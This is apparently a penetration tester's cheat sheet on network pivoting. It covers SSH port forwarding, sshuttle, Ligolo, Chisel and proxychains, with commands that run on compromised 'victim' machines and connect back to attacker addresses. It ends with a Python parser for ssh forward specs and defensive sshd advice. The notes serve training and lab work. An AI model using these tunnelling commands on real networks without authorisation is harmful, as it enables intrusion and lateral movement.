| Concept | Direction | Example |
|---|---|---|
| Local Port Forwarding | Local to Remote | ssh -L 8080:localhost:8080 user@remote_server_ip |
| Remote Port Forwarding | Remote to Local | ssh -R 3306:localhost:3306 user@remote_server_ip |
| Reverse Tunnel | Remote to Local | ssh -R 8080:localhost:8080 user@public_server_ip |
| Forward Tunnel | Local to Remote | ssh -L 3306:remote_database_ip:3306 user@remote_server_ip |
Sshuttle
sshuttle -r username@<remote_ip> $CIDR
Traffic for $CIDR is now routed through the SSH host. sshuttle only carries TCP, so scan with a connect scan and skip host discovery (ICMP does not traverse the tunnel):
sudo nmap --top-ports=20 -sT -Pn IP
Ligolo
- On attacker machine:
sudo ./proxy -selfcert -laddr $VPN_IP:443 (Use port based on firewall)
- On the machine we have ssh access to (Windows agent or Linux agent respectively; --ignore-cert is needed because the proxy uses a self-signed certificate):
agent_windows.exe -connect <attacker_ip>:<attacker_port> --ignore-cert
./agent -connect <attacker_ip>:<attacker_port> --ignore-cert
- Once the connection is established we need to set up the tunnel from the proxy console:
session
autoroute
- Now we can scan the network as usual
If you already have a sliver session
upload agent.exe
execute agent.exe -connect 192.168.45.195:9001 --ignore-cert
Chisel
After obtaining the reverse shell
Transfer the chisel binary to the machine where you obtained the shell, matching the OS and architecture of that machine.
On your machine as Server:
./chisel server -p 8000 --reverse
On the Victim Machine:
./chisel client <attacker_ip>:<attacker_port> R:socks
On attacker's Machine:
Modify the file (R:socks opens the SOCKS listener on the server side, port 1080 by default):
sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080
Then before using any command just write proxychains ahead of it.
proxychains nmap -sT ip
- Multi pivot scenarios
On my local machine:
./chisel server -p 8002 --reverse
./chisel server -p 8004 --reverse
On 10.10.10.123:
./chiselj client 10.10.16.108:8002 R:1080:socks
On DC01:
.\chiselj.exe client 10.10.16.108:8004 R:1090:socks
SSH Local Port Forwarding
ssh -N -L [bind_address:]port:host:hostport [username@address]
-N tells ssh not to run a remote command, so the session exists only to carry the forward.
SSH Remote Port Forwarding
In this case, we have access to a non-root shell on a Linux client on the internal network. On this compromised machine, we discover that a MySQL server is running on TCP port 3306. Unlike the previous scenario, the firewall is blocking inbound TCP port 22 (SSH) connections, so we can’t SSH into this server from our Internet-connected Kali machine.
The ssh command syntax to create this tunnel will include the local IP and port, the remote IP and port, and -R to specify a remote forward:
ssh -N -R [bind_address:]port:host:hostport [username@address]
SSH Dynamic Port Forwarding
SSH dynamic port forwarding allows us to set a local listening port and have it tunnel incoming traffic to any remote destination through the use of a proxy.
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>
sudo vim /etc/proxychains.conf
socks4 127.0.0.1 8080
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110
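The direction table at the top and the three SSH sections all hinge on one question: for a given -L, -R or -D argument, which machine gets a new listening socket and which machine makes the outbound connection. The following is an added example (not part of the original notes, and not OpenSSH code) that parses the `[bind_address:]port:host:hostport` grammar from ssh(1), including bracketed IPv6 literals and the empty/`*` bind address, and reports that for any ssh command line. The `Forward` type, function names and the sample commands (copied from the table above) are this example's own constructions; the proxychains entry it emits corresponds to the `-D` forward, since `ssh -D` speaks both SOCKS4 and SOCKS5.

```python
"""Parse OpenSSH forwarding specs and state which side listens and which side
connects. Grammar from ssh(1):
  -L [bind_address:]port:host:hostport
  -R [bind_address:]port:host:hostport
  -D [bind_address:]port
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Forward:
    kind: str                 # "L", "R" or "D"
    bind_address: str         # "localhost" when omitted, "*" for all interfaces
    port: int                 # listening port
    host: Optional[str]       # destination host; None for -D (chosen per SOCKS request)
    hostport: Optional[int]


def _split_outside_brackets(spec: str) -> List[str]:
    """Split on ':' except inside [...] so IPv6 literals survive."""
    parts, cur, depth = [], "", 0
    for ch in spec:
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        elif ch == ":" and depth == 0:
            parts.append(cur)
            cur = ""
            continue
        cur += ch
    if depth != 0:
        raise ValueError(f"unbalanced brackets in {spec!r}")
    parts.append(cur)
    return [p.strip("[]") for p in parts]


def _port(text: str) -> int:
    port = int(text)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {text}")
    return port


def parse_forward(flag: str, spec: str) -> Forward:
    """flag is -L, -R or -D; spec is the argument that follows it."""
    kind = flag.lstrip("-").upper()
    if kind not in ("L", "R", "D"):
        raise ValueError(f"unsupported flag {flag!r}")
    parts = _split_outside_brackets(spec)
    expected = 1 if kind == "D" else 3
    bind_address = "localhost"
    if len(parts) == expected + 1:          # optional leading bind_address present
        bind_address, parts = parts[0], parts[1:]
        if bind_address == "":               # ssh(1): empty address or '*' means all interfaces
            bind_address = "*"
    if len(parts) != expected:
        raise ValueError(f"malformed {flag} spec {spec!r}")
    if kind == "D":
        return Forward(kind, bind_address, _port(parts[0]), None, None)
    port, host, hostport = parts
    return Forward(kind, bind_address, _port(port), host, _port(hostport))


def forwards_from_command(cmd: str) -> List[Forward]:
    """Extract every -L/-R/-D forward from an ssh command line (spaced or attached form)."""
    argv = shlex.split(cmd)
    found: List[Forward] = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-L", "-R", "-D") and i + 1 < len(argv):
            found.append(parse_forward(arg, argv[i + 1]))
            i += 2
            continue
        if len(arg) > 2 and arg[:2] in ("-L", "-R", "-D"):
            found.append(parse_forward(arg[:2], arg[2:]))
        i += 1
    return found


def describe(fwd: Forward) -> dict:
    """'client' is where ssh runs, 'server' is the sshd host."""
    if fwd.kind == "R":                      # -R: sshd host listens, ssh client connects out
        listener, connector = "server", "client"
    else:                                    # -L and -D: ssh client listens, sshd host connects out
        listener, connector = "client", "server"
    dest = ("any host:port the SOCKS client asks for" if fwd.kind == "D"
            else f"{fwd.host}:{fwd.hostport}")
    return {
        "listener_on": listener,
        "listen": f"{fwd.bind_address}:{fwd.port}",
        "connects_from": connector,
        "destination": dest,
        # a listener bound beyond loopback is reachable by other hosts on that network
        "exposed_beyond_loopback": fwd.bind_address in ("*", "0.0.0.0", "::"),
    }


def proxychains_line(fwd: Forward) -> str:
    """proxychains.conf entry matching a -D forward."""
    if fwd.kind != "D":
        raise ValueError("only -D creates a SOCKS proxy")
    addr = "127.0.0.1" if fwd.bind_address in ("localhost", "*") else fwd.bind_address
    return f"socks5 {addr} {fwd.port}"


if __name__ == "__main__":
    # sample commands copied from the table and SSH sections above
    for cmd in ("ssh -L 8080:localhost:8080 user@remote_server_ip",
                "ssh -R 3306:localhost:3306 user@remote_server_ip",
                "ssh -N -D 127.0.0.1:8080 user@remote_server_ip"):
        for fwd in forwards_from_command(cmd):
            print(cmd, "->", describe(fwd))
```

From the defender's side, `exposed_beyond_loopback` is the field that matters: an `-L` or `-D` listener bound to `*` is reachable by every host on the attacker-side network, and an `-R` listener on the sshd host is loopback-only unless `GatewayPorts` is enabled in sshd_config, so a review of `AllowTcpForwarding` and `GatewayPorts` on exposed servers limits what any of the commands on this page can achieve.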